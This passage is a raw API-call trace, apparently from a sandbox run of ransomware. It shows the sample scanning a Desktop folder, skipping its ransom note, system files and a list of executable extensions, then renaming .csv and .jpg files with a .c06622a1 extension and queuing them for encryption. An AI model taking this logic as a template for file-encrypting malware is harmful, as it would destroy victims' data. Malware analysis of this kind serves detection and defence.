(_Str1="hta", _Str2="csv") returned 5 [0148.197] wcslen (_String="hta") returned 0x3 [0148.197] _wcsicmp (_Str1="msi", _Str2="csv") returned 10 [0148.197] wcslen (_String="msi") returned 0x3 [0148.197] _wcsicmp (_Str1="pdb", _Str2="csv") returned 13 [0148.197] wcslen (_String="pdb") returned 0x3 [0148.197] _wcsicmp (_Str1="sql", _Str2="csv") returned 16 [0148.197] wcslen (_String="sql") returned 0x3 [0148.197] _wcsicmp (_Str1="sqlite", _Str2="csv") returned 16 [0148.198] wcslen (_String="sqlite") returned 0x6 [0148.198] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn")) returned 0x10 [0148.198] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0148.198] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn" [0148.198] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn") returned 0x45 [0148.198] wcscpy (in: _Dest=0x4530134, _Source="1vBK_M.csv" | out: _Dest="1vBK_M.csv") returned="1vBK_M.csv" [0148.198] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\1vBK_M.csv", dwFileAttributes=0x80) returned 1 [0148.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\1vBK_M.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn\\1vbk_m.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x654 [0148.198] SetFilePointerEx (in: hFile=0x654, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.198] ReadFile (in: hFile=0x654, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0148.199] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0x8841ad3a [0148.199] RtlComputeCrc32 (PartialCrc=0xad3a, Buffer=0x3fe674, Length=0x80) returned 0x2f570ff5 [0148.199] RtlComputeCrc32 (PartialCrc=0xff5, Buffer=0x3fe674, Length=0x80) returned 0x9a58bbe4 [0148.199] RtlComputeCrc32 (PartialCrc=0xbbe4, Buffer=0x3fe674, Length=0x80) returned 0x2d889d54 [0148.199] RtlComputeCrc32 (PartialCrc=0x9d54, Buffer=0x3fe674, Length=0x80) returned 0x65e67480 [0148.199] CloseHandle (hObject=0x654) returned 1 [0148.199] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0148.199] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\1vBK_M.csv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\1vBK_M.csv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\1vBK_M.csv" [0148.199] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\1vBK_M.csv") returned 0x50 [0148.199] wcscpy (in: _Dest=0x4540150, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.199] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\1vBK_M.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn\\1vbk_m.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\1vBK_M.csv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn\\1vbk_m.csv.c06622a1"), dwFlags=0x8) returned 1 [0148.202] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\1vBK_M.csv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn\\1vbk_m.csv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x654 [0148.202] CreateIoCompletionPort (FileHandle=0x654, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0148.202] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x41f0020 [0148.207] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5b7b15f8 [0148.207] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x66ef8b32 [0148.207] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x26b7f691 [0148.207] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x45ad1ff5 [0148.207] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4e789b02 [0148.207] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x60d42077 [0148.207] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3874536d [0148.207] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1f3e45cc [0148.210] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x41f0094, Length=0x80) returned 0x829d8742 [0148.210] RtlComputeCrc32 (PartialCrc=0x8742, Buffer=0x41f0094, Length=0x80) returned 0x10448c44 [0148.210] RtlComputeCrc32 (PartialCrc=0x8c44, Buffer=0x41f0094, Length=0x80) returned 0xd4aedd33 [0148.210] RtlComputeCrc32 (PartialCrc=0xdd33, Buffer=0x41f0094, Length=0x80) returned 0xbf254d5b [0148.210] RtlComputeCrc32 (PartialCrc=0x4d5b, Buffer=0x41f0094, Length=0x80) returned 0xfa304c65 [0148.210] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0148.210] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0148.210] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0148.210] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7ee1df0, ftCreationTime.dwHighDateTime=0x1d5e2ef, ftLastAccessTime.dwLowDateTime=0xc8d6e570, ftLastAccessTime.dwHighDateTime=0x1d5d869, ftLastWriteTime.dwLowDateTime=0xc8d6e570, ftLastWriteTime.dwHighDateTime=0x1d5d869, nFileSizeHigh=0x0, nFileSizeLow=0x1298f, dwReserved0=0x0, dwReserved1=0x0, cFileName="6DA0rOZsvCx.jpg", cAlternateFileName="6DA0RO~1.JPG")) returned 1 [0148.210] _wcsicmp (_Str1="6DA0rOZsvCx.jpg", _Str2="README.c06622a1.TXT") returned -60 [0148.210] wcsstr (_Str="6DA0rOZsvCx.jpg", _SubStr="README") returned 0x0 [0148.210] _wcsicmp (_Str1="autorun.inf", _Str2="6DA0rOZsvCx.jpg") returned 43 [0148.211] wcslen (_String="autorun.inf") returned 0xb [0148.211] _wcsicmp (_Str1="boot.ini", _Str2="6DA0rOZsvCx.jpg") returned 44 [0148.211] wcslen (_String="boot.ini") returned 0x8 [0148.211] _wcsicmp (_Str1="bootfont.bin", _Str2="6DA0rOZsvCx.jpg") returned 44 [0148.211] wcslen (_String="bootfont.bin") returned 0xc [0148.211] _wcsicmp (_Str1="bootsect.bak", _Str2="6DA0rOZsvCx.jpg") returned 44 [0148.211] wcslen (_String="bootsect.bak") returned 0xc [0148.211] _wcsicmp (_Str1="desktop.ini", _Str2="6DA0rOZsvCx.jpg") returned 46 [0148.211] wcslen (_String="desktop.ini") returned 0xb [0148.211] _wcsicmp (_Str1="iconcache.db", _Str2="6DA0rOZsvCx.jpg") returned 51 [0148.211] wcslen (_String="iconcache.db") returned 0xc [0148.211] _wcsicmp (_Str1="ntldr", _Str2="6DA0rOZsvCx.jpg") returned 56 [0148.211] wcslen (_String="ntldr") returned 0x5 [0148.211] _wcsicmp (_Str1="ntuser.dat", _Str2="6DA0rOZsvCx.jpg") returned 56 [0148.211] wcslen (_String="ntuser.dat") returned 0xa [0148.211] _wcsicmp (_Str1="ntuser.dat.log", _Str2="6DA0rOZsvCx.jpg") returned 56 [0148.211] wcslen (_String="ntuser.dat.log") returned 0xe [0148.211] _wcsicmp (_Str1="ntuser.ini", _Str2="6DA0rOZsvCx.jpg") returned 56 [0148.211] wcslen (_String="ntuser.ini") returned 0xa [0148.211] _wcsicmp (_Str1="thumbs.db", _Str2="6DA0rOZsvCx.jpg") returned 62 [0148.211] wcslen (_String="thumbs.db") returned 0x9 [0148.211] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0148.211] wcslen (_String="386") returned 0x3 [0148.211] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0148.211] wcslen (_String="adv") returned 0x3 [0148.211] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0148.211] wcslen (_String="ani") returned 0x3 [0148.211] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0148.211] wcslen (_String="bat") returned 0x3 [0148.211] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0148.211] wcslen (_String="bin") returned 0x3 [0148.211] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0148.211] wcslen (_String="cab") returned 0x3 [0148.211] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0148.211] wcslen (_String="cmd") returned 0x3 [0148.211] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0148.211] wcslen (_String="com") returned 0x3 [0148.211] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0148.212] wcslen (_String="cpl") returned 0x3 [0148.212] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0148.212] wcslen (_String="cur") returned 0x3 [0148.212] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0148.212] wcslen (_String="deskthemepack") returned 0xd [0148.212] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0148.212] wcslen (_String="diagcab") returned 0x7 [0148.212] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0148.212] wcslen (_String="diagcfg") returned 0x7 [0148.212] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0148.212] wcslen (_String="diagpkg") returned 0x7 [0148.212] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0148.212] wcslen (_String="dll") returned 0x3 [0148.212] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0148.212] wcslen (_String="drv") returned 0x3 [0148.212] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0148.212] wcslen (_String="exe") returned 0x3 [0148.212] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0148.212] wcslen (_String="hlp") returned 0x3 [0148.212] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0148.212] wcslen (_String="icl") returned 0x3 [0148.212] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0148.212] wcslen (_String="icns") returned 0x4 [0148.212] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0148.212] wcslen (_String="ico") returned 0x3 [0148.212] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0148.212] wcslen (_String="ics") returned 0x3 [0148.212] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0148.212] wcslen (_String="idx") returned 0x3 [0148.212] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0148.212] wcslen (_String="ldf") returned 0x3 [0148.212] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0148.212] wcslen (_String="lnk") returned 0x3 [0148.212] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0148.212] wcslen (_String="mod") returned 0x3 [0148.212] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0148.212] wcslen (_String="mpa") returned 0x3 [0148.213] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0148.213] wcslen (_String="msc") returned 0x3 [0148.213] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0148.213] wcslen (_String="msp") returned 0x3 [0148.213] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0148.213] wcslen (_String="msstyles") returned 0x8 [0148.213] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0148.213] wcslen (_String="msu") returned 0x3 [0148.213] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0148.213] wcslen (_String="nls") returned 0x3 [0148.213] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0148.213] wcslen (_String="nomedia") returned 0x7 [0148.213] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0148.213] wcslen (_String="ocx") returned 0x3 [0148.213] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0148.213] wcslen (_String="prf") returned 0x3 [0148.213] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0148.213] wcslen (_String="ps1") returned 0x3 [0148.213] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0148.213] wcslen (_String="rom") returned 0x3 [0148.213] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0148.213] wcslen (_String="rtp") returned 0x3 [0148.213] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0148.213] wcslen (_String="scr") returned 0x3 [0148.213] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0148.213] wcslen (_String="shs") returned 0x3 [0148.213] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0148.213] wcslen (_String="spl") returned 0x3 [0148.213] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0148.213] wcslen (_String="sys") returned 0x3 [0148.213] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0148.213] wcslen (_String="theme") returned 0x5 [0148.213] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0148.213] wcslen (_String="themepack") returned 0x9 [0148.213] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0148.213] wcslen (_String="wpx") returned 0x3 [0148.213] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0148.213] wcslen (_String="lock") returned 0x4 [0148.213] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0148.213] wcslen (_String="key") returned 0x3 [0148.214] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0148.214] wcslen (_String="hta") returned 0x3 [0148.214] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0148.214] wcslen (_String="msi") returned 0x3 [0148.214] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0148.214] wcslen (_String="pdb") returned 0x3 [0148.214] _wcsicmp (_Str1="sql", _Str2="jpg") returned 9 [0148.214] wcslen (_String="sql") returned 0x3 [0148.214] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0148.214] wcslen (_String="sqlite") returned 0x6 [0148.214] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn")) returned 0x10 [0148.214] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0148.214] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn" [0148.214] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn") returned 0x45 [0148.214] wcscpy (in: _Dest=0x4530134, _Source="6DA0rOZsvCx.jpg" | out: _Dest="6DA0rOZsvCx.jpg") returned="6DA0rOZsvCx.jpg" [0148.214] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\6DA0rOZsvCx.jpg", dwFileAttributes=0x80) returned 1 [0148.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\6DA0rOZsvCx.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn\\6da0rozsvcx.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x648 [0148.215] SetFilePointerEx (in: hFile=0x648, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.215] ReadFile (in: hFile=0x648, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0148.216] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0xc89390b1 [0148.216] RtlComputeCrc32 (PartialCrc=0x90b1, Buffer=0x3fe674, Length=0x80) returned 0x71be43a9 [0148.216] RtlComputeCrc32 (PartialCrc=0x43a9, Buffer=0x3fe674, Length=0x80) returned 0xdd174ff7 [0148.216] RtlComputeCrc32 (PartialCrc=0x4ff7, Buffer=0x3fe674, Length=0x80) returned 0xb7d6b4a8 [0148.216] RtlComputeCrc32 (PartialCrc=0xb4a8, Buffer=0x3fe674, Length=0x80) returned 0x261c71d7 [0148.216] CloseHandle (hObject=0x648) returned 1 [0148.216] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0148.216] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\6DA0rOZsvCx.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\6DA0rOZsvCx.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\6DA0rOZsvCx.jpg" [0148.216] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\6DA0rOZsvCx.jpg") returned 0x55 [0148.216] wcscpy (in: _Dest=0x454015a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.216] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\6DA0rOZsvCx.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn\\6da0rozsvcx.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\6DA0rOZsvCx.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn\\6da0rozsvcx.jpg.c06622a1"), dwFlags=0x8) returned 1 [0148.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Id8szDz7a0w\\TJ6EEdNAUO4l9hn\\6DA0rOZsvCx.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\id8szdz7a0w\\tj6eednauo4l9hn\\6da0rozsvcx.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x648 [0148.220] CreateIoCompletionPort (FileHandle=0x648, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0148.220] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4280020 [0148.225] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x57592545 [0148.225] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7f359c31 [0148.225] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1c38e35c [0148.226] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1f7c0fd8 [0148.226] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x64967ee2 [0148.226] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4000348 [0148.226] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x50a4334a [0148.226] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4546a03c [0148.229] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4280094, Length=0x80) returned 0xa1f65815 [0148.229] RtlComputeCrc32 (PartialCrc=0x5815, Buffer=0x4280094, Length=0x80) returned 0x17d1d001 [0148.229] RtlComputeCrc32 (PartialCrc=0xd001, Buffer=0x4280094, Length=0x80) returned 0x8d62f019 [0148.229] RtlComputeCrc32 (PartialCrc=0xf019, Buffer=0x4280094, Length=0x80) returned 0xdc8eb1d7 [0148.229] RtlComputeCrc32 (PartialCrc=0xb1d7, Buffer=0x4280094, Length=0x80) returned 0xb77869d7 [0148.229] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0148.229] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0148.229] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0148.229] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9177c90, ftCreationTime.dwHighDateTime=0x1d5e57d, ftLastAccessTime.dwLowDateTime=0x6cb109f0, ftLastAccessTime.dwHighDateTime=0x1d5e6f7, ftLastWriteTime.dwLowDateTime=0x6cb109f0, ftLastWriteTime.dwHighDateTime=0x1d5e6f7, nFileSizeHigh=0x0, nFileSizeLow=0x43b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="cmaaKq91yJ82Pxf.flv", cAlternateFileName="CMAAKQ~1.FLV")) returned 1 [0148.229] _wcsicmp (_Str1="cmaaKq91yJ82Pxf.flv", _Str2="README.c06622a1.TXT") returned -15 [0148.229] wcsstr (_Str="cmaaKq91yJ82Pxf.flv", _SubStr="README") returned 0x0 [0148.229] _wcsicmp (_Str1="autorun.inf", _Str2="cmaaKq91yJ82Pxf.flv") returned -2 [0148.229] wcslen (_String="autorun.inf") returned 0xb [0148.229] _wcsicmp (_Str1="boot.ini", _Str2="cmaaKq91yJ82Pxf.flv") returned -1 [0148.229] wcslen (_String="boot.ini") returned 0x8 [0148.229] _wcsicmp (_Str1="bootfont.bin", _Str2="cmaaKq91yJ82Pxf.flv") returned -1 [0148.229] wcslen (_String="bootfont.bin") returned 0xc [0148.229] _wcsicmp (_Str1="bootsect.bak", _Str2="cmaaKq91yJ82Pxf.flv") returned -1 [0148.229] wcslen (_String="bootsect.bak") returned 0xc [0148.229] _wcsicmp (_Str1="desktop.ini", _Str2="cmaaKq91yJ82Pxf.flv") returned 1 [0148.229] wcslen (_String="desktop.ini") returned 0xb [0148.229] _wcsicmp (_Str1="iconcache.db", _Str2="cmaaKq91yJ82Pxf.flv") returned 6 [0148.229] wcslen (_String="iconcache.db") returned 0xc [0148.229] _wcsicmp (_Str1="ntldr", _Str2="cmaaKq91yJ82Pxf.flv") returned 11 [0148.229] wcslen (_String="ntldr") returned 0x5 [0148.229] _wcsicmp (_Str1="ntuser.dat", _Str2="cmaaKq91yJ82Pxf.flv") returned 11 [0148.229] wcslen (_String="ntuser.dat") returned 0xa [0148.229] _wcsicmp (_Str1="ntuser.dat.log", _Str2="cmaaKq91yJ82Pxf.flv") returned 11 [0148.230] wcslen (_String="ntuser.dat.log") returned 0xe [0148.230] _wcsicmp (_Str1="ntuser.ini", _Str2="cmaaKq91yJ82Pxf.flv") returned 11 [0148.230] wcslen (_String="ntuser.ini") returned 0xa [0148.230] _wcsicmp (_Str1="thumbs.db", _Str2="cmaaKq91yJ82Pxf.flv") returned 17 [0148.230] wcslen (_String="thumbs.db") returned 0x9 [0148.230] _wcsicmp (_Str1="386", _Str2="flv") returned -51 [0148.230] wcslen (_String="386") returned 0x3 [0148.230] _wcsicmp (_Str1="adv", _Str2="flv") returned -5 [0148.230] wcslen (_String="adv") returned 0x3 [0148.230] _wcsicmp (_Str1="ani", _Str2="flv") returned -5 [0148.230] wcslen (_String="ani") returned 0x3 [0148.230] _wcsicmp (_Str1="bat", _Str2="flv") returned -4 [0148.230] wcslen (_String="bat") returned 0x3 [0148.230] _wcsicmp (_Str1="bin", _Str2="flv") returned -4 [0148.230] wcslen (_String="bin") returned 0x3 [0148.230] _wcsicmp (_Str1="cab", _Str2="flv") returned -3 [0148.230] wcslen (_String="cab") returned 0x3 [0148.230] _wcsicmp (_Str1="cmd", _Str2="flv") returned -3 [0148.230] wcslen (_String="cmd") returned 0x3 [0148.230] _wcsicmp (_Str1="com", _Str2="flv") returned -3 [0148.230] wcslen (_String="com") returned 0x3 [0148.230] _wcsicmp (_Str1="cpl", _Str2="flv") returned -3 [0148.230] wcslen (_String="cpl") returned 0x3 [0148.230] _wcsicmp (_Str1="cur", _Str2="flv") returned -3 [0148.230] wcslen (_String="cur") returned 0x3 [0148.230] _wcsicmp (_Str1="deskthemepack", _Str2="flv") returned -2 [0148.230] wcslen (_String="deskthemepack") returned 0xd [0148.230] _wcsicmp (_Str1="diagcab", _Str2="flv") returned -2 [0148.230] wcslen (_String="diagcab") returned 0x7 [0148.230] _wcsicmp (_Str1="diagcfg", _Str2="flv") returned -2 [0148.230] wcslen (_String="diagcfg") returned 0x7 [0148.230] _wcsicmp (_Str1="diagpkg", _Str2="flv") returned -2 [0148.230] wcslen (_String="diagpkg") returned 0x7 [0148.230] _wcsicmp (_Str1="dll", _Str2="flv") returned -2 [0148.230] wcslen (_String="dll") returned 0x3 [0148.230] _wcsicmp (_Str1="drv", _Str2="flv") returned -2 [0148.231] wcslen (_String="drv") returned 0x3 [0148.231] _wcsicmp (_Str1="exe", _Str2="flv") returned -1 [0148.231] wcslen (_String="exe") returned 0x3 [0148.231] _wcsicmp (_Str1="hlp", _Str2="flv") returned 2 [0148.231] wcslen (_String="hlp") returned 0x3 [0148.231] _wcsicmp (_Str1="icl", _Str2="flv") returned 3 [0148.231] wcslen (_String="icl") returned 0x3 [0148.231] _wcsicmp (_Str1="icns", _Str2="flv") 